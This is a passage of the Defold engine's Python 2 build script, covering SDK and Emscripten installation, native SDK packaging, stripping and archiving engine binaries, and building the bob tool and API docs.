folders.append(join(sdkfolder, 'Win32','WindowsKits','10'))
folders.append(join(sdkfolder, 'Win32','MicrosoftVisualStudio14.0','VC'))
if self.target_platform in ('armv7-android', 'arm64-android'):
folders.append(join(sdkfolder, PACKAGES_ANDROID_NDK))
folders.append(join(sdkfolder, PACKAGES_ANDROID_SDK))
for f in folders:
if not os.path.exists(f):
print "Missing SDK in", f
print "Run './scripts/build.py install_ext --platform=%s'" % self.target_platform
sys.exit(1)
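# Illustrative sketch (not from the original source): for target_platform
# 'arm64-darwin', check_sdk() expects a layout like
#   <dynamo_home>/ext/SDKs/MacOSX11.3.sdk
#   <dynamo_home>/ext/SDKs/XcodeDefault12.5.xctoolchain
#   <dynamo_home>/ext/SDKs/iPhoneOS14.5.sdk
#   <dynamo_home>/ext/SDKs/iPhoneSimulator14.5.sdk
# and exits with a hint to run './scripts/build.py install_ext' if any folder
# is missing.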
def install_sdk(self):
sdkfolder = join(self.ext, 'SDKs')
target_platform = self.target_platform
if target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
# macOS SDK
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_MACOS_SDK), join(sdkfolder, PACKAGES_MACOS_SDK))
download_sdk(self,'%s/%s.darwin.tar.gz' % (self.package_path, PACKAGES_XCODE_TOOLCHAIN), join(sdkfolder, PACKAGES_XCODE_TOOLCHAIN))
if target_platform in ('armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
# iOS SDK
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_IOS_SDK), join(sdkfolder, PACKAGES_IOS_SDK))
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_IOS_SIMULATOR_SDK), join(sdkfolder, PACKAGES_IOS_SIMULATOR_SDK))
if 'win32' in target_platform or ('win32' in self.host2):
win32_sdk_folder = join(self.ext, 'SDKs', 'Win32')
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_WIN32_SDK_10), join(win32_sdk_folder, 'WindowsKits', '10') )
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_WIN32_TOOLCHAIN), join(win32_sdk_folder, 'MicrosoftVisualStudio14.0'), strip_components=0 )
# On OSX, the file system is already case insensitive, so no need to duplicate the files as we do on the extender server
if target_platform in ('armv7-android', 'arm64-android'):
host = self.host
if 'win32' in host:
host = 'windows'
elif 'linux' in host:
host = 'linux'
# Android NDK
download_sdk(self, '%s/%s-%s-x86_64.tar.gz' % (self.package_path, PACKAGES_ANDROID_NDK, host), join(sdkfolder, PACKAGES_ANDROID_NDK))
# Android SDK
download_sdk(self, '%s/%s-%s-android-30-30.0.3.tar.gz' % (self.package_path, PACKAGES_ANDROID_SDK, host), join(sdkfolder, PACKAGES_ANDROID_SDK))
if 'linux' in self.host2:
download_sdk(self, '%s/%s.tar.xz' % (self.package_path, PACKAGES_LINUX_TOOLCHAIN), join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG), format='J')
if target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios') and 'linux' in self.host2:
if not os.path.exists(join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG, 'cctools')):
download_sdk(self, '%s/%s.tar.gz' % (self.package_path, PACKAGES_CCTOOLS_PORT), join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG), force_extract=True)
build_private.install_sdk(self, target_platform)
def get_ems_dir(self):
return join(self.ext, 'SDKs', 'emsdk-' + EMSCRIPTEN_VERSION_STR)
def _form_ems_path(self):
upstream = join(self.get_ems_dir(), 'upstream', 'emscripten')
if os.path.exists(upstream):
return upstream
return join(self.get_ems_dir(), 'fastcomp', 'emscripten')
def install_ems(self):
# TODO: should eventually be moved to install_sdk
emsDir = self.get_ems_dir()
os.environ['EMSCRIPTEN'] = self._form_ems_path()
os.environ['EM_CONFIG'] = join(self.get_ems_dir(), '.emscripten')
os.environ['EM_CACHE'] = join(self.get_ems_dir(), 'emscripten_cache')
if os.path.isdir(emsDir):
print "Emscripten is already installed:", emsDir
else:
self._check_package_path()
platform_map = {'x86_64-linux':'linux','x86_64-darwin':'darwin','x86_64-win32':'win32'}
path = join(self.package_path, '%s-%s.tar.gz' % (PACKAGES_EMSCRIPTEN_SDK, platform_map.get(self.host, self.host)))
path = self.get_local_or_remote_file(path)
self._extract(path, join(self.ext, 'SDKs'))
config = os.environ['EM_CONFIG']
if not os.path.isfile(config):
self.activate_ems()
def activate_ems(self):
version = EMSCRIPTEN_VERSION_STR
if 'fastcomp' in self._form_ems_path():
version += "-fastcomp"
run.env_command(self._form_env(), [join(self.get_ems_dir(), 'emsdk'), 'activate', version, '--embedded'])
# prewarm the cache
# Although this method might be more "correct", it also takes 10 minutes more than we'd like on CI
#run.env_command(self._form_env(), ['%s/embuilder.py' % self._form_ems_path(), 'build', 'SYSTEM', 'MINIMAL'])
# .. so we stick with the old version of prewarming
# Compile a file to warm up the emscripten caches (libc etc)
c_file = tempfile.mktemp(suffix='.c')
exe_file = tempfile.mktemp(suffix='.js')
with open(c_file, 'w') as f:
f.write('int main() { return 0; }')
run.env_command(self._form_env(), ['%s/emcc' % self._form_ems_path(), c_file, '-o', '%s' % exe_file])
def check_ems(self):
config = join(self.get_ems_dir(), '.emscripten')
err = False
if not os.path.isfile(config):
print 'No .emscripten file.'
err = True
emsDir = self.get_ems_dir()
if not os.path.isdir(emsDir):
print 'Emscripten tools not installed.'
err = True
if err:
print 'Consider running install_ems'
def _git_sha1(self, ref = None):
return self.build_utility.git_sha1(ref)
def _ziptree(self, path, outfile = None, directory = None):
# Directory is similar to -C in tar
if not outfile:
outfile = tempfile.NamedTemporaryFile(delete = False)
zip = zipfile.ZipFile(outfile, 'w', zipfile.ZIP_DEFLATED)
for root, dirs, files in os.walk(path):
for f in files:
p = os.path.join(root, f)
an = p
if directory:
an = os.path.relpath(p, directory)
zip.write(p, an)
zip.close()
return outfile.name
def _add_files_to_zip(self, zip, paths, directory=None, topfolder=None):
for p in paths:
if not os.path.isfile(p):
continue
an = p
if directory:
an = os.path.relpath(p, directory)
if topfolder:
an = os.path.join(topfolder, an)
zip.write(p, an)
def is_cross_platform(self):
return self.host != self.target_platform
def is_desktop_target(self):
return self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32']
# package the native SDK, return the path to the zip file
def _package_platform_sdk(self, platform):
with open(join(self.dynamo_home, 'defoldsdk.zip'), 'wb') as outfile:
zip = zipfile.ZipFile(outfile, 'w', zipfile.ZIP_DEFLATED)
topfolder = 'defoldsdk'
defold_home = os.path.normpath(os.path.join(self.dynamo_home, '..', '..'))
# Includes
includes = []
for root, dirs, files in os.walk(os.path.join(self.dynamo_home, "sdk/include")):
for file in files:
if file.endswith('.h'):
includes.append(os.path.join(root, file))
# proto _ddf.h + "res_*.h"
for root, dirs, files in os.walk(os.path.join(self.dynamo_home, "include")):
for file in files:
if file.endswith('.h') and ('ddf' in file or file.startswith('res_')):
includes.append(os.path.join(root, file))
self._add_files_to_zip(zip, includes, self.dynamo_home, topfolder)
# Configs
configs = ['extender/build.yml']
configs = [os.path.join(self.dynamo_home, x) for x in configs]
self._add_files_to_zip(zip, configs, self.dynamo_home, topfolder)
# Variants
variants = []
for root, dirs, files in os.walk(os.path.join(self.dynamo_home, "extender/variants")):
for file in files:
if file.endswith('.appmanifest'):
variants.append(os.path.join(root, file))
self._add_files_to_zip(zip, variants, self.dynamo_home, topfolder)
def _findlibs(libdir):
paths = os.listdir(libdir)
paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.a', '.dylib', '.so', '.lib', '.dll')]
return paths
def _findjars(jardir, ends_with):
paths = os.listdir(jardir)
paths = [os.path.join(jardir, x) for x in paths if x.endswith(ends_with)]
return paths
def _findjslibs(libdir):
paths = os.listdir(libdir)
paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.js',)]
return paths
def _findfiles(directory, exts):
paths = []
for root, dirs, files in os.walk(directory):
for f in files:
if os.path.splitext(f)[1] in exts:
paths.append(os.path.join(root, f))
return paths
# Dynamo libs
libdir = os.path.join(self.dynamo_home, 'lib/%s' % platform)
paths = _findlibs(libdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# External libs
libdir = os.path.join(self.dynamo_home, 'ext/lib/%s' % platform)
paths = _findlibs(libdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# Android Jars (Dynamo)
jardir = os.path.join(self.dynamo_home, 'share/java')
paths = _findjars(jardir, ('android.jar', 'dlib.jar', 'r.jar'))
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# Android Jars (external)
external_jars = ("android-support-multidex.jar",
"androidx-multidex.jar",
"android.jar")
jardir = os.path.join(self.dynamo_home, 'ext/share/java')
paths = _findjars(jardir, external_jars)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# Win32 resource files
defold_ico = os.path.join(self.dynamo_home, 'lib/%s/defold.ico' % platform)
engine_rc = os.path.join(self.dynamo_home, 'lib/%s/engine.rc' % platform)
self._add_files_to_zip(zip, [defold_ico, engine_rc], self.dynamo_home, topfolder)
# JavaScript files
# js-web-pre-x files
jsdir = os.path.join(self.dynamo_home, 'share')
paths = _findjslibs(jsdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# libraries for js-web
jsdir = os.path.join(self.dynamo_home, 'lib/js-web/js/')
paths = _findjslibs(jsdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# libraries for wasm-web
jsdir = os.path.join(self.dynamo_home, 'lib/wasm-web/js/')
paths = _findjslibs(jsdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# .proto files
for d in ['share/proto/', 'ext/include/google/protobuf']:
protodir = os.path.join(self.dynamo_home, d)
paths = _findfiles(protodir, ('.proto',))
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# pipeline tools
if platform in ('x86_64-darwin','x86_64-linux','x86_64-win32'): # needed for the linux build server
# protoc
protoc = os.path.join(self.dynamo_home, 'ext/bin/%s/protoc' % platform)
ddfc_py = os.path.join(self.dynamo_home, 'bin/ddfc.py')
ddfc_cxx = os.path.join(self.dynamo_home, 'bin/ddfc_cxx')
ddfc_cxx_bat = os.path.join(self.dynamo_home, 'bin/ddfc_cxx.bat')
ddfc_java = os.path.join(self.dynamo_home, 'bin/ddfc_java')
# protoc plugin (ddfc.py) needs our dlib_shared too
plugin_pb2 = os.path.join(self.dynamo_home, 'lib/python/plugin_pb2.py')
ddf_init = os.path.join(self.dynamo_home, 'lib/python/ddf/__init__.py')
ddf_extensions_pb2 = os.path.join(self.dynamo_home, 'lib/python/ddf/ddf_extensions_pb2.py')
ddf_math_pb2 = os.path.join(self.dynamo_home, 'lib/python/ddf/ddf_math_pb2.py')
dlib_init = os.path.join(self.dynamo_home, 'lib/python/dlib/__init__.py')
self._add_files_to_zip(zip, [protoc, ddfc_py, ddfc_java, ddfc_cxx, ddfc_cxx_bat, plugin_pb2, ddf_init, ddf_extensions_pb2, ddf_math_pb2, dlib_init], self.dynamo_home, topfolder)
# we don't want to run "pip install" on individual sdk files, so we copy the python files as-is
protobuf_files = []
for root, dirs, files in os.walk(os.path.join(self.dynamo_home, 'ext/lib/python/google')):
for f in files:
_, ext = os.path.splitext(f)
print root, f
if ext in ('.pyc',):
continue
path = os.path.join(root, f)
protobuf_files.append(path)
if not protobuf_files:
raise Exception("Failed to find python protobuf folder")
self._add_files_to_zip(zip, protobuf_files, self.dynamo_home, topfolder)
# bob pipeline classes
bob_light = os.path.join(self.dynamo_home, 'share/java/bob-light.jar')
self._add_files_to_zip(zip, [bob_light], self.dynamo_home, topfolder)
# For logging, print all paths in zip:
for x in zip.namelist():
print(x)
zip.close()
return outfile.name
return None
def build_platform_sdk(self):
# Helper function to make it easier to build a platform sdk locally
try:
path = self._package_platform_sdk(self.target_platform)
except Exception, e:
print "Failed to package sdk for platform %s: %s" % (self.target_platform, e)
else:
print "Wrote %s" % path
def build_builtins(self):
with open(join(self.dynamo_home, 'share', 'builtins.zip'), 'wb') as f:
self._ziptree(join(self.dynamo_home, 'content', 'builtins'), outfile = f, directory = join(self.dynamo_home, 'content'))
def _strip_engine(self, path):
""" Strips the debug symbols from an executable """
if self.target_platform not in ['x86_64-linux','x86_64-darwin','armv7-darwin','arm64-darwin','x86_64-ios','armv7-android','arm64-android']:
return False
sdkfolder = join(self.ext, 'SDKs')
strip = "strip"
if 'android' in self.target_platform:
ANDROID_NDK_VERSION = '20'
ANDROID_NDK_ROOT = os.path.join(sdkfolder,'android-ndk-r%s' % ANDROID_NDK_VERSION)
ANDROID_GCC_VERSION = '4.9'
if self.target_platform == 'armv7-android':
ANDROID_PLATFORM = 'arm-linux-androideabi'
elif self.target_platform == 'arm64-android':
ANDROID_PLATFORM = 'aarch64-linux-android'
ANDROID_HOST = 'linux' if sys.platform == 'linux2' else 'darwin'
strip = "%s/toolchains/%s-%s/prebuilt/%s-x86_64/bin/%s-strip" % (ANDROID_NDK_ROOT, ANDROID_PLATFORM, ANDROID_GCC_VERSION, ANDROID_HOST, ANDROID_PLATFORM)
if self.target_platform in ('x86_64-darwin','armv7-darwin','arm64-darwin','x86_64-ios') and 'linux2' == sys.platform:
strip = os.path.join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG, 'bin', 'x86_64-apple-darwin19-strip')
run.shell_command("%s %s" % (strip, path))
return True
def archive_engine(self):
sha1 = self._git_sha1()
full_archive_path = join(sha1, 'engine', self.target_platform).replace('\\', '/')
share_archive_path = join(sha1, 'engine', 'share').replace('\\', '/')
java_archive_path = join(sha1, 'engine', 'share', 'java').replace('\\', '/')
dynamo_home = self.dynamo_home
self.full_archive_path = full_archive_path
bin_dir = self.build_utility.get_binary_path()
lib_dir = self.target_platform
# upload editor 2.0 launcher
if self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32']:
launcher_name = format_exes("launcher", self.target_platform)[0]
launcherbin = join(bin_dir, launcher_name)
self.upload_to_archive(launcherbin, '%s/%s' % (full_archive_path, launcher_name))
# upload gdc tool on desktop platforms
if self.is_desktop_target():
gdc_name = format_exes("gdc", self.target_platform)[0]
gdc_bin = join(bin_dir, gdc_name)
self.upload_to_archive(gdc_bin, '%s/%s' % (full_archive_path, gdc_name))
for n in ['dmengine', 'dmengine_release', 'dmengine_headless']:
for engine_name in format_exes(n, self.target_platform):
engine = join(bin_dir, engine_name)
self.upload_to_archive(engine, '%s/%s' % (full_archive_path, engine_name))
engine_stripped = join(bin_dir, engine_name + "_stripped")
shutil.copy2(engine, engine_stripped)
if self._strip_engine(engine_stripped):
self.upload_to_archive(engine_stripped, '%s/stripped/%s' % (full_archive_path, engine_name))
if 'win32' in self.target_platform:
pdb = join(bin_dir, os.path.splitext(engine_name)[0] + '.pdb')
self.upload_to_archive(pdb, '%s/%s' % (full_archive_path, os.path.basename(pdb)))
if 'web' in self.target_platform:
engine_mem = join(bin_dir, engine_name + '.mem')
if os.path.exists(engine_mem):
self.upload_to_archive(engine_mem, '%s/%s.mem' % (full_archive_path, engine_name))
engine_symbols = join(bin_dir, engine_name + '.symbols')
if os.path.exists(engine_symbols):
self.upload_to_archive(engine_symbols, '%s/%s.symbols' % (full_archive_path, engine_name))
elif 'darwin' in self.target_platform:
engine_symbols = join(bin_dir, engine_name + '.dSYM.zip')
if os.path.exists(engine_symbols):
self.upload_to_archive(engine_symbols, '%s/%s' % (full_archive_path, os.path.basename(engine_symbols)))
zip_archs = []
if not self.skip_docs:
zip_archs.append('ref-doc.zip')
if not self.skip_builtins:
zip_archs.append('builtins.zip')
for zip_arch in zip_archs:
self.upload_to_archive(join(dynamo_home, 'share', zip_arch), '%s/%s' % (share_archive_path, zip_arch))
if self.target_platform == 'x86_64-linux':
# NOTE: It's arbitrary for which platform we archive dlib.jar. Currently set to linux 64-bit
self.upload_to_archive(join(dynamo_home, 'share', 'java', 'dlib.jar'), '%s/dlib.jar' % (java_archive_path))
if 'android' in self.target_platform:
files = [
('share/java', 'classes.dex'),
('ext/share/java', 'android.jar'),
]
for f in files:
src = join(dynamo_home, f[0], f[1])
self.upload_to_archive(src, '%s/%s' % (full_archive_path, f[1]))
resources = self._ziptree(join(dynamo_home, 'ext', 'share', 'java', 'res'), directory = join(dynamo_home, 'ext', 'share', 'java'))
self.upload_to_archive(resources, '%s/android-resources.zip' % (full_archive_path))
if self.is_desktop_target():
libs = ['dlib', 'texc', 'particle']
for lib in libs:
lib_name = format_lib('%s_shared' % (lib), self.target_platform)
lib_path = join(dynamo_home, 'lib', lib_dir, lib_name)
self.upload_to_archive(lib_path, '%s/%s' % (full_archive_path, lib_name))
sdkpath = self._package_platform_sdk(self.target_platform)
self.upload_to_archive(sdkpath, '%s/defoldsdk.zip' % full_archive_path)
def _get_build_flags(self):
supported_tests = {}
supported_tests['darwin'] = ['darwin', 'x86_64-darwin']
supported_tests['x86_64-win32'] = ['win32', 'x86_64-win32', 'arm64-nx64']
supports_tests = self.target_platform in supported_tests.get(self.host, []) or self.host == self.target_platform
skip_tests = '--skip-tests' if self.skip_tests or not supports_tests else ''
skip_codesign = '--skip-codesign' if self.skip_codesign else ''
disable_ccache = '--disable-ccache' if self.disable_ccache else ''
return {'skip_tests':skip_tests, 'skip_codesign':skip_codesign, 'disable_ccache':disable_ccache, 'prefix':None}
def get_base_platforms(self):
# Base platforms is the platforms to build the base libs for.
# The base libs are the libs needed to build bob, i.e. contains compiler code.
platform_dependencies = {'darwin': ['darwin', 'x86_64-darwin'], # x86_64-darwin from IOS fix 3dea8222
'x86_64-linux': [],
'x86_64-win32': ['win32']}
platforms = list(platform_dependencies.get(self.host, [self.host]))
if not self.host in platforms:
platforms.append(self.host)
return platforms
def _build_engine_cmd(self, skip_tests, skip_codesign, disable_ccache, prefix):
prefix = prefix and prefix or self.dynamo_home
return 'python %s/ext/bin/waf --prefix=%s %s %s %s distclean configure build install' % (self.dynamo_home, prefix, skip_tests, skip_codesign, disable_ccache)
def _build_engine_lib(self, args, lib, platform, skip_tests = False, dir = 'engine'):
self._log('Building %s for %s' % (lib, platform))
skip_build_tests = []
if skip_tests and '--skip-build-tests' not in self.waf_options:
skip_build_tests.append('--skip-tests')
skip_build_tests.append('--skip-build-tests')
cwd = join(self.defold_root, '%s/%s' % (dir, lib))
plf_args = ['--platform=%s' % platform]
run.env_command(self._form_env(), args + plf_args + self.waf_options + skip_build_tests, cwd = cwd)
def build_bob_light(self):
self._log('Building bob light')
bob_dir = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
common_dir = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.common')
sha1 = self._git_sha1()
if os.path.exists(os.path.join(self.dynamo_home, 'archive', sha1)):
run.env_shell_command(self._form_env(), "./scripts/copy.sh", cwd = bob_dir)
ant = join(self.dynamo_home, 'ext/share/ant/bin/ant')
ant_args = ['-logger', 'org.apache.tools.ant.listener.AnsiColorLogger']
if self.verbose:
ant_args += ['-v']
env = self._form_env()
env['ANT_OPTS'] = '-Dant.logger.defaults=%s/ant-logger-colors.txt' % join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test')
env['DM_BOB_EXT_LIB_DIR'] = os.path.join(common_dir, 'ext')
env['DM_BOB_CLASS_DIR'] = os.path.join(bob_dir, 'build')
s = run.command(" ".join([ant, 'clean', 'compile-bob-light'] + ant_args),
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob'), shell = True, env = env)
if self.verbose:
print s
s = run.command(" ".join([ant, 'install-bob-light'] + ant_args), cwd = bob_dir, shell = True, env = env)
if self.verbose:
print s
def build_engine(self):
self.check_sdk()
# We want a random folder to thoroughly test bob-light
# We don't want it to unpack for _every_ single invocation during the build
os.environ['DM_BOB_ROOTFOLDER'] = tempfile.mkdtemp(prefix='bob-light-')
self._log("env DM_BOB_ROOTFOLDER=" + os.environ['DM_BOB_ROOTFOLDER'])
cmd = self._build_engine_cmd(**self._get_build_flags())
args = cmd.split()
host = self.host2
if 'x86-' in host:
host = self.host
if host == 'darwin':
host = 'x86_64-darwin'
# Make sure we build these for the host platform for the toolchain (bob light)
for lib in ['dlib', 'texc']:
skip_tests = host != self.target_platform
self._build_engine_lib(args, lib, host, skip_tests = skip_tests)
if not self.skip_bob_light:
# We must build bob-light, which builds content during the engine build
self.build_bob_light()
# Target libs to build
engine_libs = list(ENGINE_LIBS)
if host != self.target_platform:
engine_libs.insert(0, 'dlib')
if self.is_desktop_target():
engine_libs.insert(1, 'texc')
for lib in engine_libs:
if not build_private.is_library_supported(self.target_platform, lib):
continue
self._build_engine_lib(args, lib, self.target_platform)
self._build_engine_lib(args, 'extender', self.target_platform, dir = 'share')
if not self.skip_docs:
self.build_docs()
if not self.skip_builtins:
self.build_builtins()
if '--static-analyze' in self.waf_options:
scan_output_dir = os.path.normpath(os.path.join(os.environ['DYNAMO_HOME'], '..', '..', 'static_analyze'))
report_dir = os.path.normpath(os.path.join(os.environ['DYNAMO_HOME'], '..', '..', 'report'))
run.command(['python', './scripts/scan_build_gather_report.py', '-o', report_dir, '-i', scan_output_dir])
print("Wrote report to %s. Open with 'scan-view .' or 'python -m SimpleHTTPServer'" % report_dir)
shutil.rmtree(scan_output_dir)
if os.path.exists(os.environ['DM_BOB_ROOTFOLDER']):
print "Removing", os.environ['DM_BOB_ROOTFOLDER']
shutil.rmtree(os.environ['DM_BOB_ROOTFOLDER'])
def build_external(self):
flags = self._get_build_flags()
flags['prefix'] = join(self.defold_root, 'packages')
cmd = self._build_engine_cmd(**flags)
args = cmd.split() + ['package']
for lib in EXTERNAL_LIBS:
self._build_engine_lib(args, lib, platform=self.target_platform, dir='external')
def archive_bob(self):
sha1 = self._git_sha1()
full_archive_path = join(sha1, 'bob').replace('\\', '/')
for p in glob(join(self.dynamo_home, 'share', 'java', 'bob.jar')):
self.upload_to_archive(p, '%s/%s' % (full_archive_path, basename(p)))
def copy_local_bob_artefacts(self):
texc_name = format_lib('texc_shared', self.host2)
luajit_dir = tempfile.mkdtemp()
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
missing = {}
def add_missing(plf, txt):
missing.setdefault(plf, []).append(txt)
for plf in [['x86_64-win32', 'x86_64-win32'], ['x86_64-linux', 'x86_64-linux'], ['x86_64-darwin', 'x86_64-darwin']]:
luajit_path = join(cwd, '../../packages/luajit-2.1.0-beta3-%s.tar.gz' % (plf[0]))
if not os.path.exists(luajit_path):
add_missing(plf[1], "package '%s' could not be found" % (luajit_path))
else:
self._extract(luajit_path, luajit_dir)
luajit_exe = format_exes('luajit-32', plf[1])[0]
luajit_exe_64 = format_exes('luajit-64', plf[1])[0]
self._copy(join(luajit_dir, 'bin/%s/%s' % (plf[0], luajit_exe)), join(cwd, 'libexec/%s/%s' % (plf[1], luajit_exe)))
self._copy(join(luajit_dir, 'bin/%s/%s' % (plf[0], luajit_exe_64)), join(cwd, 'libexec/%s/%s' % (plf[1], luajit_exe_64)))
win32_files = dict([['ext/lib/%s/%s.dll' % (plf[0], lib), 'lib/%s/%s.dll' % (plf[1], lib)] for lib in ['OpenAL32', 'wrap_oal'] for plf in [['win32', 'x86-win32'], ['x86_64-win32', 'x86_64-win32']]])
osx_files = dict([['ext/lib/%s/lib%s.dylib' % (plf[0], lib), 'lib/%s/lib%s.dylib' % (plf[1], lib)] for lib in [] for plf in [['x86_64-darwin', 'x86_64-darwin']]])
linux_files = dict([['ext/lib/%s/lib%s.so' % (plf[0], lib), 'lib/%s/lib%s.so' % (plf[1], lib)] for lib in [] for plf in [['x86_64-linux', 'x86_64-linux']]])
js_files = {}
android_files = {'share/java/classes.dex': 'lib/classes.dex',
'ext/share/java/android.jar': 'lib/android.jar'}
switch_files = {}
# This dict is being built up and will eventually be used for copying in the end
# - "type" - what the files are needed for, for error reporting
# - pairs of src-file -> dst-file
artefacts = {'generic': {'share/java/dlib.jar': 'lib/dlib.jar',
'share/builtins.zip': 'lib/builtins.zip',
'lib/%s/%s' % (self.host2, texc_name): 'lib/%s/%s' % (self.host2, texc_name)},
'android-bundling': android_files,
'win32-bundling': win32_files,
'js-bundling': js_files,
'ios-bundling': {},
'osx-bundling': osx_files,
'linux-bundling': linux_files,
'switch-bundling': switch_files}
# Add dmengine to 'artefacts' procedurally
for type, plfs in {'android-bundling': [['armv7-android', 'armv7-android'], ['arm64-android', 'arm64-android']],
'win32-bundling': [['win32', 'x86-win32'], ['x86_64-win32', 'x86_64-win32']],
'js-bundling': [['js-web', 'js-web'], ['wasm-web', 'wasm-web']],
'ios-bundling': [['armv7-darwin', 'armv7-darwin'], ['arm64-darwin', 'arm64-darwin'], ['x86_64-ios', 'x86_64-ios']],
'osx-bundling': [['x86_64-darwin', 'x86_64-darwin']],
'linux-bundling': [['x86_64-linux', 'x86_64-linux']],
'switch-bundling': [['arm64-nx64', 'arm64-nx64']]}.iteritems():
# plfs is pairs of src-platform -> dst-platform
for plf in plfs:
exes = format_exes('dmengine', plf[1]) + format_exes('dmengine_release', plf[1])
artefacts[type].update(dict([['bin/%s/%s' % (plf[0], exe), 'libexec/%s/%s' % (plf[1], exe)] for exe in exes]))
# Perform the actual copy, or list which files are missing
for type, files in artefacts.iteritems():
m = []
for src, dst in files.iteritems():
src_path = join(self.dynamo_home, src)
if not os.path.exists(src_path):
m.append(src_path)
else:
dst_path = join(cwd, dst)
self._mkdirs(os.path.dirname(dst_path))
self._copy(src_path, dst_path)
if m:
add_missing(type, m)
if missing:
print('*** NOTE! There are missing artefacts.')
print(json.dumps(missing, indent=2))
def build_bob(self):
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
bob_dir = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
common_dir = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.common')
sha1 = self._git_sha1()
if os.path.exists(os.path.join(self.dynamo_home, 'archive', sha1)):
run.env_shell_command(self._form_env(), "./scripts/copy.sh", cwd = bob_dir)
else:
self.copy_local_bob_artefacts()
env = self._form_env()
ant = join(self.dynamo_home, 'ext/share/ant/bin/ant')
ant_args = ['-logger', 'org.apache.tools.ant.listener.AnsiColorLogger']
env['ANT_OPTS'] = '-Dant.logger.defaults=%s/ant-logger-colors.txt' % join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test')
env['DM_BOB_EXT_LIB_DIR'] = os.path.join(common_dir, 'ext')
env['DM_BOB_CLASS_DIR'] = os.path.join(bob_dir, 'build')
run.command(" ".join([ant, 'clean', 'compile'] + ant_args), cwd = bob_dir, shell = True, env = env)
run.command(" ".join([ant, 'install'] + ant_args), cwd = bob_dir, shell = True, env = env)
if not self.skip_tests:
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test')
args = [ant, 'test-clean', 'test'] + ant_args
run.command(" ".join(args), cwd = cwd, shell = True, env = env, stdout = None)
def build_sdk(self):
tempdir = tempfile.mkdtemp() # where the sdk ends up
sha1 = self._git_sha1()
u = urlparse.urlparse(self.get_archive_path())
bucket = s3.get_bucket(u.netloc)
root = urlparse.urlparse(self.get_archive_path()).path[1:]
base_prefix = os.path.join(root, sha1)
platforms = get_target_platforms()
# Since we usually want to use the scripts in this package on a linux machine, we'll unpack
# it last, in order to preserve unix line endings in the files
if 'x86_64-linux' in platforms:
platforms.remove('x86_64-linux')
platforms.append('x86_64-linux')
for platform in platforms:
prefix = os.path.join(base_prefix, 'engine', platform, 'defoldsdk.zip')
entry = bucket.get_key(prefix)
if entry is None:
raise Exception("Could not find sdk: %s" % prefix)
platform_sdk_zip = tempfile.NamedTemporaryFile(delete = False)
print "Downloading", entry.key
entry.get_contents_to_filename(platform_sdk_zip.name)
print "Downloaded", entry.key, "to", platform_sdk_zip.name
self._extract_zip(platform_sdk_zip.name, tempdir)
print "Extracted", platform_sdk_zip.name, "to", tempdir
os.unlink(platform_sdk_zip.name)
print ""
# Due to an issue with how the attributes are preserved, let's go through the bin/ folders
# and set the flags explicitly
for root, dirs, files in os.walk(tempdir):
for f in files:
p = os.path.join(root, f)
if '/bin/' in p:
os.chmod(p, 0o755)
st = os.stat(p)
treepath = os.path.join(tempdir, 'defoldsdk')
sdkpath = self._ziptree(treepath, directory=tempdir)
print "Packaged defold sdk from", tempdir, "to", sdkpath
sdkurl = join(sha1, 'engine').replace('\\', '/')
self.upload_to_archive(sdkpath, '%s/defoldsdk.zip' % sdkurl)
shutil.rmtree(tempdir)
print "Removed", tempdir
def build_docs(self):
skip_tests = '--skip-tests' if self.skip_tests or self.target_platform != self.host else ''
self._log('Building API docs')
cwd = join(self.defold_root, 'engine/docs')
cmd = 'python %s/ext/bin/waf configure --prefix=%s %s distclean configure build install' % (self.dynamo_home, self.dynamo_home, skip_tests)
run.env_command(self._form_env(), cmd.split() + self.waf_options, cwd = cwd)
with open(join(self.dynamo_home, 'share', 'ref-doc.zip'), 'wb') as f:
self._ziptree(join(self.dynamo_home, 'share', 'doc'), outfile = f, directory = join(self.dynamo_home, 'share'))
# ------------------------------------------------------------
# BEGIN: EDITOR 2
#
def download_editor2(self):
if not self.channel:
raise Exception('No channel provided when downloading the editor')
editor_filename = "Defold-%s.zip" % self.target_platform
editor_path = join(self.defold_root, 'editor', 'target', 'editor', editor_filename)
s3_path = join(self._git_sha1(), self.channel, 'editor2', editor_filename)
self.download_from_archive(s3_path, editor_path)
def archive_editor2(self):
if not self.channel:
raise Exception('No channel provided when archiving the editor')
sha1 = self._git_sha1()
full_archive_path = join(sha1, self.channel, 'editor2')
zip_file = "Defold-%s.zip" % self.target_platform
dmg_file = "Defold-%s.dmg" % self.target_platform
